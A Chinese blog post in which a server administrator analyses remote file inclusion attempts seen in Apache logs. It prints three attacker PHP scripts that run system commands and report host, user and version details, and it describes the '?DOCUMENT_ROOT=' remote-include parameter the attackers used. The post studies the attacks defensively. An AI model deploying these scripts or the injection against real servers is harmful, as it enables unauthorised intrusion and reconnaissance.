近期看到的所谓“Web Attack”

最新推荐文章于 2024-04-16 22:42:21 发布
最新推荐文章于 2024-04-16 22:42:21 发布
阅读量1.2k 收藏
点赞数
文章标签: web server php system os user
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chqdnico/article/details/2828789
版权
这一两星期经常看到Apache log中出现和remote file inclusion有关的「攻击」,一时好奇,抓其中一个档案来看一看,赫然发现并不是盲目直接攻击,反而像大量搜集伺服器资料。拿其中一个看到的档案为例:


<?
echo "BraT<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER[&apos;SERVER_NAME&apos;];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "NigeriaN HackerS TeaM<br>";
exit;
?>
另一个也差不多:


<?php
function ConvertBytes($number)
{
         $len = strlen($number);
         if($len < 4)
         {
                 return sprintf("%d b", $number);
         }
         if($len >= 4 && $len <=6)
         {
                 return sprintf("%0.2f Kb", $number/1024);
         }
         if($len >= 7 && $len <=9)
         {
                 return sprintf("%0.2f Mb", $number/1024/1024);
         }

         return sprintf("%0.2f Gb", $number/1024/1024/1024);

}

echo "kangkung<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER[&apos;SERVER_NAME&apos;];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "kangkung was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
再来第三个,都是一样的东西:


<?
echo "ALBANIA<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER[&apos;SERVER_NAME&apos;];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";
exit;
?>
特别之处是,它们非常针对PHP,尝试哄骗PHP信任攻击者提供的DOCUMENT_ROOT来取代Apache那个,全部都是在URL后加上像"?DOCUMENT_ROOT=http://www.example.com/xxxxxx.txt "的部份,而且这个所谓的.txt其实是PHP档。我和这位仁兄一样,一时间找不到是哪个漏洞会用DOCUMENT_ROOT。

在User Agent方面,九成九都是libwww-perl,看到比较得人惊的只有这个。希望是伪造的吧,如果是真的,那就笑不出了,因为那表示这个攻击无远弗届……
chqdnico
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web-attack
08-04
web-attack  
WEB常见的攻击方式有哪些?如何防御?
茉莉蜜茶~~~
03-26 1588
一、 什么是web攻击 Web攻击(WebAttack)是针对用户上网行为或网站服务器等设备进行攻击的行为 如植入恶意代码,修改网站权限,获取网站用户隐私信息等等 Web应用程序的安全性是任何基于Web业务的重要组成部分 确保Web应用程序安全十分重要,即使是代码中很小的 bug 也有可能导致隐私信息被泄露 站点安全就是为保护站点不受未授权的访问、使用、修改和破坏而采取的行为或实践 我们常见的Web攻击方式有 XSS (Cross Site Scripting) 跨站脚本攻击 CSRF(Cross-
实训学习Day 2 网络攻击溯源与流量分析
最新发布
huilang041的博客
04-16 641
观察数据包,当服务端进行进行第二次握手之后,客户端并没有响应。通过对数据包的观察,前面部分的数据包为正常访问的数据包。标志位的数据包进行端口探测。半连接扫描的特点,我们可以通过显示过滤器过滤出。包,则说明该端口处于开放状态。所以可以判断出,这台机器一共开放了。这台主机进行端口扫描。包,则说明这个端口处于关闭状态;请求,而且目的端口一直在改变。打开数据包之后,发现大量来自。由此可以判断出,此时。
运行网站项目时,有时出现Bad Request,该怎么解决?
weixin_34066347的博客
12-08 2374
有时运行网站项目时,出现Bad Request问题 解决方法 清除浏览器的缓存,重新刷新页面就好了 如:火狐
Web攻击常见攻击方式及防范方案
游荡边缘的博客
07-26 4190
一、是什么 Web攻击(WebAttack)是针对用户上网行为或网站服务器等设备进行攻击的行为 如植入恶意代码,修改网站权限,获取网站用户隐私信息等等 Web应用程序的安全性是任何基于Web业务的重要组成部分 确保Web应用程序安全十分重要,即使是代码中很小的 bug 也有可能导致隐私信息被泄露 站点安全就是为保护站点不受未授权的访问、使用、修改和破坏而采取的行为或实践 我们常见的Web攻击方式有 XSS (Cross Site Scripting) 跨站脚本攻击 CSRF(Cross-site reque
常见的web攻击有哪些?如何防御?
weixin_46886227的博客
04-03 7314
web攻击是什么 Web攻击(WebAttack)是针对用户上网行为或网站服务器等设备进行攻击的行为,如植入恶意代码、修改网站权限、获取网站用户隐私信息等 Web应用程序的安全性是任何基于Web业务的重要组成部分 确保Web应用程序的安全十分重要,即使是代码中很小的bug也有可能导致隐私信息被泄露,站点安全就是为了保护站点不受未授权的访问、使用、修改和破坏而采取的行为或实践 常见的Web攻击有: XSS (Cross Site Scripting) 跨站脚本攻击 CSRF(Cross-site
web常见的攻击方式有哪些,以及如何进行防御?
zz130428的博客
12-20 663
DOM 型 XSS 跟前两种 XSS 的区别:DOM 型 XSS 攻击中,取出和执行恶意代码由浏览器端完成,属于前端 JavaScript 自身的安全漏洞,而其他两种 XSS 都属于服务端的安全漏洞。针对第一个要素,我们在用户输入的过程中,过滤掉用户输入的恶劣代码,然后提交给后端,但是如果攻击者绕开前端请求,直接构造请求就不能预防了。利用受害者在被攻击网站已经获取的注册凭证,绕过后台的用户验证,达到冒充用户对被攻击的网站执行某项操作的目。访问该页面后,表单会自动提交,相当于模拟用户完成了一次POST操作。
Extensible web attack framework
05-08
乌云内部渗透测试工具Extensible web attack framework
Web-Attack&Google; Hacking
08-18
Web-Attack&Google; Hacking
Web-Attack&Google; Hacker原稿
08-17
【标题】Web攻击与Google黑客技术 在网络安全领域,Web攻击和Google黑客技术是两个重要的研究方向,它们涉及网络攻防战的关键环节。Web攻击主要指的是针对Web应用程序的各种恶意行为,而Google黑客技术则是一种利用...
乌云内部工具 Extensible Web Attack Framework
04-03
传闻中的乌云内部工具 Extensible Web Attack Framework 亲测了下,没有什么太大的惊喜,入门者可以学习下,一个工具而已
赛门铁克:网络攻击模块化工具增多
edison20的专栏
11-13 491
根据赛门铁克全球网络安全威胁研究报告,恶意网页仍是最严重的网络威胁,由于模块化工具变多,也使得网络攻击方式变得更容易,其中MPack和网络钓鱼工具组,是上半年常见攻击工具。   赛门铁克全球网络安全威胁研究报告(ISRT)指出,今年上半年Web威胁仍是影响最大的网络威胁,而模块化攻击工具的增多,也使得Web攻击方式变得更容易模仿与进行。   第十二期赛门铁克全球网络安全威胁报告指出,目前所揭露的漏
WebRequest 请求被中止: 请求已被取消。 错误解决方法
weixin_30567225的博客
07-12 7373
使用HttpWebResponse的时候老是报错:"请求被中止: 请求已被取消。" 原因是添加了 contentLength 注释掉就好了, //request.ContentLength = data.Length; 转载于:https://www.cnblogs.com/domainblogs/archive/2009/03/07/1405640.html...
过期域名在攻击活动中的利用
weixin_33790053的博客
09-19 404
本文讲的是过期域名在攻击活动中的利用, 概述 注册域名所选择的名称对于网络钓鱼场景,渗透测试,特别是在红军发动攻击的过程中是非常重要的一个方面。在基于域名信誉和分类的网络环境中,面临Web过滤已经变得越来越普遍。通常情况下,发送到非常新的或未分类的域名的流量会被这样的过滤设备完全阻止 —— 在其攻击轨道中阻断网络钓鱼的有效载荷或C2代理的连接。最近在安...
12个在线网站测速工具——web性能
Backforce
02-28 5482
网站的访问速度对于一个网站非常重要,没有一个人会喜欢速度慢的网站。下面是12款在线测试网站的访问速度和性能的工具,在优化网站的时候很有用。 Pingdom 测试网站每个元素的加载速度,比如html、图片、JS文件等等。     GTmetrix GTmetrix集合了Yslow和Google Page Speed的功能,Yslow和Google Page Speed是两款FireFox
web 400 bad request原因及解决办法
热门推荐
nevermore_33的专栏
04-25 2万+
废话不说,直入主题。          现象:w
WebRequest 使用不当可能会造成线程阻塞
weixin_30563917的博客
11-08 147
使用WebRequest向网站提交数据并请求资源时需要注意,如果使用不当,可能造成阻塞,而且错误原因很难查找。很多时候我们使用WebRequest 类只是为了向网站提交数据,并不想从网站获取数据,所以可能会这样: WebRequestwr=WebRequest.Create(URL);try{...
c# HttpWebRequest 返回BadRequest(400)的信息读取
Txwtech笛克特科
08-12 3485
使用 HttpWebRequest 调用 GetResponse() 方法,返回 WebException,HttpStatusCode 是 400,无法获取返回的错误信息;在 catch 中捕获 WebException 异常,处理返回的详细信息。
wordpress弹窗插件_2020年5个最佳WordPress弹出插件(性能比较)
cumohuo9136的博客
09-05 3300
wordpress弹窗插件Are you looking for the best WordPress popup plugin? A good WordPress popup plugin helps you convert website visitors into email subscribers and paying customers. 您是否在寻找最好的WordPress弹出插件...
如何将相对路径\WebAttack\rfi\rfi.properties修改为绝对路径
05-22
要将相对路径\WebAttack\rfi\rfi.properties修改为绝对路径,可以按照以下步骤进行操作: 1. 找到 rfi.properties 文件所在的根目录的绝对路径,例如 D:\project\WebAttack\rfi。 2. 将相对路径中的 WebAttack\rfi...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值